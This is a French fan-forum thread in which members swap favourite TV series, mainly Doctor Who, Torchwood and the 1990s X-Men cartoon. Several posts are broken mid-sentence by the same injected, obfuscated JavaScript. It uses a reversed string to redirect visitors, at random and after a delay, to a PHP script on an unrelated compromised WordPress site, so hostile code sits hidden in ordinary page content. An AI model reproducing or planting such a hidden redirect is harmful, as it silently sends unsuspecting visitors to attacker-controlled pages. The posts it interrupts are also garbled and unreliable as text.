Vos séries préférées

Pour discuter de vos films favoris
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Re: Vos séries préférées

Message par Septine Madrona »

Moi je le savais! ^^
Contrairement à vous je suis complètement fan de Torchwood, j'aime bien les personnages et le côté sombre et dramatique qu'il n'y a pas dans Dr Who.
J'ai beaucoup aimé les 4 premières saisons de Dr Who, mais j'accroche pas du tout à Matt Smith et à tous les changements qu'ils ont fait. C'est plus du tout la même série pour moi.
Image
Avatar du membre
Kelevra
Dragon de Jade
Dragon de Jade
Messages : 56
Enregistré le : 04 mai 2011, 05:30
Localisation : Canada, Montréal

Re: Vos séries préférées

Message par Kelevra »

Personnellement j'aime bien matt smith, il n'est pas aussi bon que david tennant, mais il apporte de quoi de nouveau. De plus j'aime qui apporte précision sur plusieur détail qu'il nous laisse sur de précédent épisode. Cela fait 48 ans que Doctor Who et j'ai vue plusieur des premieres épisode, ainsi que le film. Je ne me lasse jamais de ce petit coté cheesy et un peut mal fait, c'est tout ce qui fait l'originalité de Doctor Who.
Vi Veri Veniversum Vivus Vici
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Vos séries préférées

Message par yami627 »

Oubliez tous ce que je viens de dire !!! je viens de retrouver MA série en DVD (c'est un anime mais m'en fiche, ca compte) J'ai nommé : X-men la série animé (la toute première attention :p) !!!!

AAAAaah ! j'adore x-men ^^
Image
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Re: Vos séries préférées

Message par Septine Madrona »

Moi j'adorais X-Men Evolution par contre.
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Vos séries préférées

Message par yami627 »

c'est pas trop mal mais rien ne vaut les VRAI X-Men XD
Image
Avatar du membre
Gatsu
Dragon aux Yeux Rouges
Dragon aux Yeux Rouges
Messages : 46
Enregistré le : 11 mars 2009, 16:19

Re: Vos séries préférées

Message par Gatsu »

Alors moi j'aime bien :
-Spartacus : blood $nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and s$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and
-Spartacus : Gods of the arena
- Dexter
-Broadwalk Empire
-Legend of the seeker ( tirée du livre l'épée de vérité pour les connaisseurs )
-Futurama
-Chuck
-Vampire Diaries
-Buffy
-The Crow
... D'autres je vous dirais plus tard qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and ca me reviendra :)
Avatar du membre
Lloyd
Dragon d'Argent
Dragon d'Argent
Messages : 100
Enregistré le : 08 mars 2009, 03:59
Localisation : Normandie
Contact :

Re: Vos séries préférées

Message par Lloyd »

yami627 a écrit :Oubliez tous ce que je viens de dire !!! je viens de retrouver MA série en DVD (c'est un anime mais m'en fiche, ca compte) J'ai nommé : X-men la série animé (la toute première attention :p) !!!!
AAAAaah ! j'adore x-men ^^

Ha yes le vieux dessin animé X-men, heu tu devais très jeune à l'époque ou ca passait non Yami?? déjà que j'étais pas vieux >_< je devais avoir 7 ou 8ans qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and je regardais ca :D
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Vos séries préférées

Message par yami627 »

mdr tu ne sais pas, je suis peut être plus vieille qu'il n'y parait huhuhu

Non en vrai j'adore X-men depuis aussi loin que remonte ma mémoire (vive Gambit et Rogue :D ) et j'avais trouvé les 6 premier épisodes en DVD il y as 2 ans. Je cherchais le reste de la série désespérément qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and je suis tombé sur le site DPstraeming... il manque quelques épisode mais qu'est ce que c'est génial ^^
Image
Avatar du membre
Lloyd
Dragon d'Argent
Dragon d'Argent
Messages : 100
Enregistré le : 08 mars 2009, 03:59
Localisation : Normandie
Contact :

Re: Vos séries préférées

Message par Lloyd »

Ça a été diffusé entre 1992 et 97 donc ouais j'avais 7-8ans aux premières diffusions mais tu a du voir les redifs ^^
Avec la super musique du générique ^^ je m'en rappel encore, oui Gambit et Malicia était très marrants et a l'époque Wolverine s'appelait Serval en vf haha

J'aimerais beaucoup les revoir mais je ne pense pas que ma connexion me permette de les voir en streaming >_<
Image
Avatar du membre
Kelevra
Dragon de Jade
Dragon de Jade
Messages : 56
Enregistré le : 04 mai 2011, 05:30
Localisation : Canada, Montréal

Re: Vos séries préférées

Message par Kelevra »

Vive Gambit, c'est le personnage le plus hot de la série. La j'attend juste que X-men first class sorte,esperon qu'il sois meilleure que les derniers.

Pis pour rester dans le même ton des anciennes émissions d'animation. Il y a aussi Transformer et Dragon Ball qui on marquer ma jeunesse.
Vi Veri Veniversum Vivus Vici
Répondre